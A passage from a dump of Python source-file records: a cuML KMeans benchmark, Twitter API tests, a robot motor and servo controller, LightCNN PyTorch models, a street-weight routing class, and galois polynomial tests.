bench.convert_to_numpy(X_test)\ntest_predict_host = bench.convert_to_numpy(test_predict)\n\nacc_test = davies_bouldin_score(X_test_host, test_predict_host)\n\nbench.print_output(library='cuml', algorithm='kmeans',\n stages=['training', 'prediction'], params=params,\n functions=['KMeans.fit', 'KMeans.predict'],\n times=[fit_time, predict_time], accuracy_type='davies_bouldin_score',\n accuracies=[acc_train, acc_test], data=[X_train, X_test],\n alg_instance=kmeans)\n"} {"ext": "py", "sha": "1a306643f9ad0da5aa548ab1e69afefd9221d1cb", "content": "\nfrom .telescope import Telescope\n"} {"ext": "py", "sha": "1a30669c1014b48ab05ee7bc1ad54bd77277dc4b", "content": "from mcstats import mcstats\n\nmcstats.registry.append(\n mcstats.MinecraftStat(\n 'pot_flower',\n {\n 'title': 'Florist',\n 'desc': 'Flowers potted',\n 'unit': 'int',\n },\n mcstats.StatReader(['minecraft:custom','minecraft:pot_flower'])\n ))\n"} {"ext": "py", "sha": "1a3066fc013335596af9d8b9f78143f165a75b42", "content": "import unittest\n\nfrom social_apis.networks.twitter_v2 import Twitter2\nfrom config import tw_access_token\n\n\nclass TestTwitter2(unittest.TestCase):\n\n def setUp(self):\n self.tweet_ids = ['1261326399320715264', '1278347468690915330']\n self.api = Twitter2(access_token=tw_access_token)\n\n def test_get_tweet(self):\n self.api.get_tweet(id=self.tweet_ids[0])\n\n def test_get_tweets(self):\n self.api.get_tweets(ids=self.tweet_ids)\n\n def test_get_compliance_jobs(self):\n self.api.get_compliance_jobs(type='tweets')\n\n def test_quota_parsing(self):\n self.api.get_compliance_jobs(type='tweets')\n self.assertIsNotNone(self.api.get_quota())\n\n"} {"ext": "py", "sha": "1a3067196b0820719f7f46d6048545e8d5f4a48d", "content": "#! /usr/bin/env python\n\n# Copyright (c) 2014, Dawn Robotics Ltd\n# All rights reserved.\n\n# Redistribution and use in source and binary forms, with or without \n# modification, are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n\n# 2. Redistributions in binary form must reproduce the above copyright notice, \n# this list of conditions and the following disclaimer in the documentation \n# and/or other materials provided with the distribution.\n\n# 3. 
Neither the name of the Dawn Robotics Ltd nor the names of its contributors \n# may be used to endorse or promote products derived from this software without \n# specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED \n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport logging\nimport math\nimport time\nimport Queue\nimport mini_driver\nimport threading\n\n#--------------------------------------------------------------------------------------------------- \nclass RobotController:\n \n MIN_ANGLE = 0.0\n MAX_ANGLE = 180.0\n CENTRE_ANGLE = (MIN_ANGLE + MAX_ANGLE)/2.0\n \n MAX_UPDATE_TIME_DIFF = 0.25\n TIME_BETWEEN_SERVO_SETTING_UPDATES = 1.0\n TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES = 0.5\n \n JOYSTICK_DEAD_ZONE = 0.1\n MAX_ABS_NECK_SPEED = 30.0 # Degrees per second\n \n MOTION_COMMAND_TIMEOUT = 2.0 # If no commands for the motors are recieved in this time then\n # the motors (drive and servo) are set to zero speed\n \n #-----------------------------------------------------------------------------------------------\n def __init__( self, robotConfig ):\n \n self.miniDriver = mini_driver.MiniDriver()\n connected = self.miniDriver.connect()\n if not connected:\n raise Exception( \"Unable to connect to the mini driver\" )\n \n self.robotConfig = robotConfig\n self.leftMotorSpeed = 0\n self.rightMotorSpeed = 0\n self.panAngle = self.CENTRE_ANGLE\n self.tiltAngle = self.CENTRE_ANGLE\n \n self.panSpeed = 0.0\n self.tiltSpeed = 0.0\n \n self.lastServoSettingsSendTime = 0.0\n self.lastSensorConfigurationSendTime = 0.0\n self.lastUpdateTime = 0.0\n self.lastMotionCommandTime = time.time()\n \n self.piSensorModuleName = \"\"\n self.piSensorModule = None\n self.piSensorReader = None\n self.piSensorDict = {}\n \n #-----------------------------------------------------------------------------------------------\n def __del__( self ):\n \n self.disconnect()\n \n #-----------------------------------------------------------------------------------------------\n def disconnect( self ):\n \n self.miniDriver.disconnect()\n \n #-----------------------------------------------------------------------------------------------\n def getStatusDict( self ):\n \n presetMaxAbsMotorSpeed, presetMaxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()\n \n statusDict = {\n \"batteryVoltage\" : self.miniDriver.getBatteryVoltageReading().data,\n \"presetMaxAbsMotorSpeed\" : presetMaxAbsMotorSpeed,\n \"presetMaxAbsTurnSpeed\" : presetMaxAbsTurnSpeed,\n \"sensors\" : self.getSensorDict()\n }\n \n return statusDict\n \n #-----------------------------------------------------------------------------------------------\n def getSensorDict( self ):\n \n sensorDict = {\n \"batteryVoltage\" : self.miniDriver.getBatteryVoltageReading(),\n \"digital\" : self.miniDriver.getDigitalReadings(),\n \"analog\" : 
self.miniDriver.getAnalogReadings(),\n \"ultrasonic\" : self.miniDriver.getUltrasonicReading(),\n \"encoders\" : self.miniDriver.getEncodersReading(),\n }\n \n sensorDict.update( self.piSensorDict )\n \n return sensorDict\n \n #-----------------------------------------------------------------------------------------------\n def normaliseJoystickData( self, joystickX, joystickY ):\n \n stickVectorLength = math.sqrt( joystickX**2 + joystickY**2 )\n if stickVectorLength > 1.0:\n joystickX /= stickVectorLength\n joystickY /= stickVectorLength\n \n if stickVectorLength < self.JOYSTICK_DEAD_ZONE:\n joystickX = 0.0\n joystickY = 0.0\n \n return ( joystickX, joystickY )\n \n #-----------------------------------------------------------------------------------------------\n def centreNeck( self ):\n \n self.panAngle = self.CENTRE_ANGLE\n self.tiltAngle = self.CENTRE_ANGLE\n self.panSpeed = 0.0\n self.tiltSpeed = 0.0\n \n #-----------------------------------------------------------------------------------------------\n def setMotorJoystickPos( self, joystickX, joystickY ):\n \n joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY )\n \n if self.robotConfig.usePresetMotorSpeeds:\n \n maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()\n \n else:\n \n maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed\n maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed\n \n # Set forward speed from joystickY\n leftMotorSpeed = maxAbsMotorSpeed*joystickY\n rightMotorSpeed = maxAbsMotorSpeed*joystickY\n \n # Set turn speed from joystickX\n leftMotorSpeed += maxAbsTurnSpeed*joystickX\n rightMotorSpeed -= maxAbsTurnSpeed*joystickX\n \n leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) )\n rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) )\n \n self.leftMotorSpeed = leftMotorSpeed*self.robotConfig.leftMotorScale\n self.rightMotorSpeed = rightMotorSpeed\n \n self.lastMotionCommandTime = time.time()\n \n #-----------------------------------------------------------------------------------------------\n def setMotorSpeeds( self, leftMotorSpeed, rightMotorSpeed ):\n \n if self.robotConfig.usePresetMotorSpeeds:\n \n maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()\n \n else:\n \n maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed\n maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed\n \n self.leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) )\n self.rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) )\n \n self.lastMotionCommandTime = time.time()\n \n #-----------------------------------------------------------------------------------------------\n def setNeckJoystickPos( self, joystickX, joystickY ):\n \n joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY )\n \n # Set pan and tilt angle speeds\n self.panSpeed = -self.MAX_ABS_NECK_SPEED*joystickX\n self.tiltSpeed = -self.MAX_ABS_NECK_SPEED*joystickY\n \n self.lastMotionCommandTime = time.time()\n \n #-----------------------------------------------------------------------------------------------\n def setNeckAngles( self, panAngle, tiltAngle ):\n \n self.panAngle = max( self.MIN_ANGLE, min( panAngle, self.MAX_ANGLE ) )\n self.tiltAngle = max( self.MIN_ANGLE, min( tiltAngle, self.MAX_ANGLE ) )\n self.panSpeed = 0.0\n self.tiltSpeed = 0.0\n \n self.lastMotionCommandTime = time.time()\n \n 
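    # Note on the joystick handling above: normaliseJoystickData() rescales the stick
    # vector to unit length when it exceeds 1.0 and zeroes it inside the dead zone,
    # and setMotorJoystickPos() then applies a simple "arcade" mix:
    #
    #   left  = maxAbsMotorSpeed*joystickY + maxAbsTurnSpeed*joystickX
    #   right = maxAbsMotorSpeed*joystickY - maxAbsTurnSpeed*joystickX
    #
    # with both results clamped to [-maxAbsMotorSpeed, maxAbsMotorSpeed]. As a purely
    # illustrative example (the limits here are hypothetical, not values taken from this
    # project): with maxAbsMotorSpeed=50, maxAbsTurnSpeed=20 and a stick at (x=0.6, y=0.8),
    # the mix gives left=52 -> clamped to 50 and right=28, so the robot drives forward
    # while turning toward the slower right-hand side. Only the left motor speed is
    # additionally multiplied by robotConfig.leftMotorScale, which acts as a trim factor.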
#-----------------------------------------------------------------------------------------------\n def _loadPiSensorModule( self ):\n \n if self.robotConfig.piSensorModuleName != \"\":\n \n # Try to import the new sensor module\n newSensorModule = None\n try:\n \n newSensorModule = __import__( self.robotConfig.piSensorModuleName, fromlist=[''] )\n \n except Exception as e:\n logging.error( \"Caught exception when trying to import Pi sensor module\" )\n logging.error( str( e ) )\n \n if newSensorModule != None:\n \n # We have a new sensor module. Shutdown any existing sensor reader\n if self.piSensorReader != None:\n self.piSensorReader.shutdown()\n self.piSensorReader = None\n \n # Remove reference to existing sensor module\n self.piSensorModule = None\n self.piSensorModuleName = \"\"\n \n # Try to create the new Pi sensor reader\n newSensorReader = None\n \n try:\n \n newSensorReader = newSensorModule.PiSensorReader()\n \n except Exception as e:\n logging.error( \"Caught exception when trying to create Pi sensor reader\" )\n logging.error( str( e ) )\n \n if newSensorReader != None:\n self.piSensorModule = newSensorModule\n self.piSensorModuleName = self.robotConfig.piSensorModuleName\n self.piSensorReader = newSensorReader\n \n #-----------------------------------------------------------------------------------------------\n def update( self ):\n \n if not self.miniDriver.isConnected():\n return\n \n curTime = time.time()\n timeDiff = min( curTime - self.lastUpdateTime, self.MAX_UPDATE_TIME_DIFF )\n \n # Turn off the motors if we haven't received a motion command for a while\n if curTime - self.lastMotionCommandTime > self.MOTION_COMMAND_TIMEOUT:\n\n self.leftMotorSpeed = 0.0\n self.rightMotorSpeed = 0.0\n self.panSpeed = 0.0\n self.tiltSpeed = 0.0\n \n # Update the pan and tilt angles\n self.panAngle += self.panSpeed*timeDiff\n self.tiltAngle += self.tiltSpeed*timeDiff\n \n self.panAngle = max( self.MIN_ANGLE, min( self.panAngle, self.MAX_ANGLE ) )\n self.tiltAngle = max( self.MIN_ANGLE, min( self.tiltAngle, self.MAX_ANGLE ) )\n \n # Update the mini driver\n self.miniDriver.setOutputs(\n self.leftMotorSpeed, self.rightMotorSpeed, self.panAngle, self.tiltAngle )\n self.miniDriver.update()\n \n # Send servo settings if needed\n if curTime - self.lastServoSettingsSendTime >= self.TIME_BETWEEN_SERVO_SETTING_UPDATES:\n \n self.miniDriver.setPanServoLimits( \n self.robotConfig.panPulseWidthMin, \n self.robotConfig.panPulseWidthMax )\n self.miniDriver.setTiltServoLimits( \n self.robotConfig.tiltPulseWidthMin, \n self.robotConfig.tiltPulseWidthMax )\n \n self.lastServoSettingsSendTime = curTime\n \n # Send sensor configuration if needed\n if curTime - self.lastSensorConfigurationSendTime >= self.TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES:\n \n self.miniDriver.setSensorConfiguration( self.robotConfig.miniDriverSensorConfiguration )\n \n self.lastSensorConfigurationSendTime = curTime\n \n # Change the Pi sensor module if needed\n if self.robotConfig.piSensorModuleName != self.piSensorModuleName:\n self._loadPiSensorModule()\n \n # Read from any sensors attached to the Pi\n if self.piSensorReader != None:\n \n self.piSensorDict = {}\n try:\n self.piSensorDict = self.piSensorReader.readSensors()\n except Exception as e:\n logging.error( \"Caught exception when trying to read from Pi sensor reader\" )\n logging.error( str( e ) )\n \n self.lastUpdateTime = curTime"} {"ext": "py", "sha": "1a306736302e368bcf1a6fff563146cd6babb1ea", "content": "import torch\r\nimport torch.nn as nn\r\nimport 
torch.nn.functional as F\r\n\r\nclass mfm(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, type=1):\r\n super(mfm, self).__init__()\r\n self.out_channels = out_channels\r\n if type == 1:\r\n self.filter = nn.Conv2d(in_channels, 2*out_channels, kernel_size=kernel_size, stride=stride, padding=padding)\r\n else:\r\n self.filter = nn.Linear(in_channels, 2*out_channels)\r\n\r\n def forward(self, x):\r\n x = self.filter(x)\r\n out = torch.split(x, self.out_channels, 1)\r\n return torch.max(out[0], out[1])\r\n\r\nclass group(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding):\r\n super(group, self).__init__()\r\n self.conv_a = mfm(in_channels, in_channels, 1, 1, 0)\r\n self.conv = mfm(in_channels, out_channels, kernel_size, stride, padding)\r\n\r\n def forward(self, x):\r\n x = self.conv_a(x)\r\n x = self.conv(x)\r\n return x\r\n\r\nclass resblock(nn.Module):\r\n def __init__(self, in_channels, out_channels):\r\n super(resblock, self).__init__()\r\n self.conv1 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1)\r\n self.conv2 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1)\r\n\r\n def forward(self, x):\r\n res = x\r\n out = self.conv1(x)\r\n out = self.conv2(out)\r\n out = out + res\r\n return out\r\n\r\nclass network_9layers(nn.Module):\r\n def __init__(self, num_classes=79077):\r\n super(network_9layers, self).__init__()\r\n self.features = nn.Sequential(\r\n mfm(1, 48, 5, 1, 2), \r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), \r\n group(48, 96, 3, 1, 1), \r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\r\n group(96, 192, 3, 1, 1),\r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), \r\n group(192, 128, 3, 1, 1),\r\n group(128, 128, 3, 1, 1),\r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\r\n )\r\n self.fc1 = mfm(8*8*128, 256, type=0)\r\n self.fc2 = nn.Linear(256, num_classes)\r\n\r\n def forward(self, x):\r\n x = self.features(x)\r\n x = x.view(x.size(0), -1)\r\n x = self.fc1(x)\r\n x = F.dropout(x, training=self.training)\r\n out = self.fc2(x)\r\n return out, x\r\n\r\nclass network_29layers(nn.Module):\r\n def __init__(self, block, layers, num_classes=79077):\r\n super(network_29layers, self).__init__()\r\n self.conv1 = mfm(1, 48, 5, 1, 2)\r\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\r\n self.block1 = self._make_layer(block, layers[0], 48, 48)\r\n self.group1 = group(48, 96, 3, 1, 1)\r\n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\r\n self.block2 = self._make_layer(block, layers[1], 96, 96)\r\n self.group2 = group(96, 192, 3, 1, 1)\r\n self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\r\n self.block3 = self._make_layer(block, layers[2], 192, 192)\r\n self.group3 = group(192, 128, 3, 1, 1)\r\n self.block4 = self._make_layer(block, layers[3], 128, 128)\r\n self.group4 = group(128, 128, 3, 1, 1)\r\n self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\r\n self.fc = mfm(8*8*128, 256, type=0)\r\n self.fc2 = nn.Linear(256, num_classes)\r\n \r\n\r\n def _make_layer(self, block, num_blocks, in_channels, out_channels):\r\n layers = []\r\n for i in range(0, num_blocks):\r\n layers.append(block(in_channels, out_channels))\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = self.pool1(x)\r\n\r\n x = self.block1(x)\r\n x = self.group1(x)\r\n x = self.pool2(x)\r\n\r\n x = self.block2(x)\r\n x = self.group2(x)\r\n x = 
self.pool3(x)\r\n\r\n x = self.block3(x)\r\n x = self.group3(x)\r\n x = self.block4(x)\r\n x = self.group4(x)\r\n x = self.pool4(x)\r\n\r\n x = x.view(x.size(0), -1)\r\n fc = self.fc(x)\r\n fc = F.dropout(fc, training=self.training)\r\n out = self.fc2(fc)\r\n return out, fc\r\n\r\n\r\nclass network_29layers_v2(nn.Module):\r\n def __init__(self, block, layers, num_classes=79077):\r\n super(network_29layers_v2, self).__init__()\r\n self.conv1 = mfm(1, 48, 5, 1, 2)\r\n self.block1 = self._make_layer(block, layers[0], 48, 48)\r\n self.group1 = group(48, 96, 3, 1, 1)\r\n self.block2 = self._make_layer(block, layers[1], 96, 96)\r\n self.group2 = group(96, 192, 3, 1, 1)\r\n self.block3 = self._make_layer(block, layers[2], 192, 192)\r\n self.group3 = group(192, 128, 3, 1, 1)\r\n self.block4 = self._make_layer(block, layers[3], 128, 128)\r\n self.group4 = group(128, 128, 3, 1, 1)\r\n self.fc = nn.Linear(8*8*128, 256)\r\n self.fc2 = nn.Linear(256, num_classes[0], bias=False)\r\n \r\n def _make_layer(self, block, num_blocks, in_channels, out_channels):\r\n layers = []\r\n for i in range(0, num_blocks):\r\n layers.append(block(in_channels, out_channels))\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block1(x)\r\n x = self.group1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block2(x)\r\n x = self.group2(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block3(x)\r\n x = self.group3(x)\r\n x = self.block4(x)\r\n x = self.group4(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = x.view(x.size(0), -1)\r\n fc = self.fc(x)\r\n x = F.dropout(fc, training=self.training)\r\n \r\n output = list()\r\n for name, fun in self.fc_dict.iteritems():\r\n out = fun(x)\r\n output.append(out)\r\n\r\n return output, fc\r\n\r\nclass network_9layers_templet(nn.Module):\r\n def __init__(self, in_channel):\r\n super(network_9layers_templet, self).__init__()\r\n self.features = nn.Sequential(\r\n mfm(in_channel, 48, 5, 1, 2), \r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), \r\n group(48, 96, 3, 1, 1), \r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\r\n group(96, 192, 3, 1, 1),\r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), \r\n group(192, 128, 3, 1, 1),\r\n group(128, 128, 3, 1, 1),\r\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\r\n )\r\n self.fc1 = mfm(8*8*128, 256, type=0)\r\n\r\n def forward(self, x):\r\n x = self.features(x)\r\n x = x.view(x.size(0), -1)\r\n x = self.fc1(x)\r\n out = F.dropout(x, training=self.training)\r\n return out\r\n\r\nclass network_29layers_v2_templet(nn.Module):\r\n def __init__(self, in_channel, block, layers):\r\n super(network_29layers_v2_templet, self).__init__()\r\n self.conv1 = mfm(in_channel, 48, 5, 1, 2)\r\n self.block1 = self._make_layer(block, layers[0], 48, 48)\r\n self.group1 = group(48, 96, 3, 1, 1)\r\n self.block2 = self._make_layer(block, layers[1], 96, 96)\r\n self.group2 = group(96, 192, 3, 1, 1)\r\n self.block3 = self._make_layer(block, layers[2], 192, 192)\r\n self.group3 = group(192, 256, 3, 1, 1)\r\n self.block4 = self._make_layer(block, layers[3], 256, 256)\r\n self.group4 = group(256, 128, 3, 1, 1)\r\n self.block5 = self._make_layer(block, layers[4], 128, 128)\r\n self.group5 = group(128, 64, 3, 1, 1)\r\n self.block6 = self._make_layer(block, layers[5], 64, 64)\r\n self.group6 = group(64, 64, 3, 1, 1)\r\n\r\n self.fc = nn.Linear(8*8*64, 256)\r\n \r\n def _make_layer(self, 
block, num_blocks, in_channels, out_channels):\r\n layers = []\r\n for i in range(0, num_blocks):\r\n layers.append(block(in_channels, out_channels))\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n '''\r\n x = self.conv1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block1(x)\r\n x = self.group1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block2(x)\r\n x = self.group2(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block3(x)\r\n x = self.group3(x)\r\n x = self.block4(x)\r\n x = self.group4(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = x.view(x.size(0), -1)\r\n fc = self.fc(x)\r\n x = F.dropout(fc, training=self.training)\r\n '''\r\n x = self.conv1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block1(x)\r\n x = self.group1(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block2(x)\r\n x = self.group2(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block3(x)\r\n x = self.group3(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block4(x)\r\n x = self.group4(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = self.block5(x)\r\n x = self.group5(x)\r\n x = self.block6(x)\r\n x = self.group6(x)\r\n x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)\r\n\r\n x = x.view(x.size(0), -1)\r\n fc = self.fc(x)\r\n x = F.dropout(fc, training=self.training)\r\n return x\r\n\r\n\r\ndef LightCNN_9Layers(**kwargs):\r\n model = network_9layers(**kwargs)\r\n return model\r\n\r\ndef LightCNN_29Layers(**kwargs):\r\n model = network_29layers(resblock, [1, 2, 3, 4], **kwargs)\r\n return model\r\n\r\ndef LightCNN_29Layers_v2(**kwargs):\r\n model = network_29layers_v2(resblock, [1, 2, 3, 4], **kwargs)\r\n return model\r\n\r\ndef LightCNN_9Layers_templet(in_channel, pretrained=False):\r\n model = network_9layers_templet(in_channel)\r\n return model\r\n\r\ndef LightCNN_29Layers_v2_templet(in_channel, pretrained=False):\r\n model = network_29layers_v2_templet(in_channel, resblock, [1,2,3,4,5,6])\r\n return model\r\n\r\n\r\nif __name__ == \"__main__\":\r\n model = LightCNN_29Layers_v2_templet(3)\r\n print(model)"} {"ext": "py", "sha": "1a306781b92398cd07a55977d0c140895c09d105", "content": "\"\"\"\n``street.py``\n=============\n\nMódulo para o peso de um trecho de rua\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom protocols import Weightable\n\nfrom random import choice\nfrom functools import total_ordering\nfrom typing import Optional, List, Any, Dict\n\n\n#: Incluir velocidade máxima entre as possibilidades\n#: de velocidade assumida naquele trecho de rua\nINCLUDE_MAX_SPEED = False\n\n\n@total_ordering\nclass Street(Weightable):\n \"\"\"\n Classe de peso (:class:`Weightable`) do trecho da rua\n\n Assim que a propriedade :attr:`~street.Street.speed` é\n lida pela primeira vez, ela assume um valor que é mantido\n com ela durante a vida do objeto.\n\n No entanto, quuando essa instância é copiada com :func:`copy.deepcopy`,\n essa propriedade é desconfigurada e ela pode assumir um novo\n valor.\n\n :param distance: distância do trecho\n :param max_speed: velocidade máxima do trecho\n \"\"\"\n\n def __init__(self, distance: float, max_speed: float):\n self._distance = distance\n self._max_speed = max_speed\n self._latest_speeds: List[float] = []\n self._speed: Optional[float] = None\n\n def register_speeds(self, *speeds: float) -> None:\n \"\"\"Registra as velocidades atuais no trecho\"\"\"\n self._latest_speeds += list(speeds)\n\n 
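    # The docstrings in this module are written in Portuguese; roughly translated, the
    # intent is: the first time the ``speed`` property below is read, the Street picks a
    # value (a random choice from the speeds registered via register_speeds(), optionally
    # including max_speed when INCLUDE_MAX_SPEED is set, and falling back to max_speed
    # when nothing was registered) and keeps that value for the lifetime of the object.
    # copy.deepcopy() deliberately returns a copy with that choice cleared so a fresh
    # value can be drawn. Streets compare by travel time (distance / speed), and a falsy
    # speed is treated as an infinite travel time.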
@property\n def speed(self) -> float:\n \"\"\"Velocidade assumida no trecho\"\"\"\n if self._speed is None:\n if INCLUDE_MAX_SPEED:\n self._speed = choice(self._latest_speeds + [self._max_speed])\n elif self._latest_speeds:\n self._speed = choice(self._latest_speeds)\n else:\n self._speed = self._max_speed\n\n return self._speed\n\n @property\n def distance(self) -> float:\n \"\"\"distância do trecho\"\"\"\n return self._distance\n\n @property\n def time(self) -> float:\n \"\"\"tempo no trecho, com a velocidade assumida\n\n Usado para a comparação entre trechos\n \"\"\"\n if self.speed:\n return self.distance / self.speed\n else:\n return float('inf')\n\n def is_inf(self) -> bool:\n \"\"\"Se a velocidade assumida representa um tempo infinito\"\"\"\n return not self.speed\n\n def __eq__(self, other: Any) -> bool:\n return isinstance(other, Street) and self.time == other.time\n\n def __lt__(self, other: Any) -> bool:\n return isinstance(other, Street) and self.time < other.time\n\n def __add__(self, other: Street) -> Street:\n \"\"\"A soma dos trechos equivale a soma dos tempos\"\"\"\n d1, d2 = self.distance, other.distance\n s1, s2 = self.speed, other.speed\n\n distance = d1 + d2\n if not s1 or not s2:\n speed = 0.0\n else:\n speed = (distance * s1 * s2) / (d1 * s2 + d2 * s1)\n return Street(distance, speed)\n\n def __repr__(self) -> str:\n return repr(self.time)\n\n def __deepcopy__(self, memo: Dict[int, Any]) -> Street:\n \"\"\"Cópia especial que não mantém a velocidade assumida\"\"\"\n new = Street(self.distance, self._max_speed)\n new.register_speeds(*self._latest_speeds)\n\n memo[id(self)] = new\n return new\n"} {"ext": "py", "sha": "1a3067addfccb44f5e88596ca682d20c01dcaa28", "content": "\"\"\"\nA pytest module to test Galois field polynomial alternate constructors.\n\"\"\"\nimport numpy as np\nimport pytest\n\nimport galois\n\n\nFIELDS = [\n galois.GF2, # GF(2)\n galois.GF(31), # GF(p) with np.int dtypes\n galois.GF(36893488147419103183), # GF(p) with object dtype\n galois.GF(2**8), # GF(2^m) with np.int dtypes\n galois.GF(2**100), # GF(2^m) with object dtype\n galois.GF(7**3), # GF(p^m) with np.int dtypes\n galois.GF(109987**4), # GF(p^m) with object dtypes\n]\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_zero(field):\n p = galois.Poly.Zero(field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 0\n assert np.array_equal(p.nonzero_degrees, [])\n assert np.array_equal(p.nonzero_coeffs, [])\n assert np.array_equal(p.degrees, [0])\n assert np.array_equal(p.coeffs, [0])\n assert p.integer == 0\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_one(field):\n p = galois.Poly.One(field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 0\n assert np.array_equal(p.nonzero_degrees, [0])\n assert np.array_equal(p.nonzero_coeffs, [1])\n assert np.array_equal(p.degrees, [0])\n assert np.array_equal(p.coeffs, [1])\n assert p.integer == 1\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_identity(field):\n p = galois.Poly.Identity(field)\n assert isinstance(p, galois.Poly)\n assert p.field is field\n assert p.degree == 1\n assert np.array_equal(p.nonzero_degrees, [1])\n assert np.array_equal(p.nonzero_coeffs, [1])\n assert np.array_equal(p.degrees, [1,0])\n assert np.array_equal(p.coeffs, [1,0])\n assert p.integer == field.order\n\n\n@pytest.mark.parametrize(\"field\", FIELDS)\ndef test_random(field):\n p = galois.Poly.Random(2, field=field)\n assert isinstance(p, galois.Poly)\n assert p.field is 
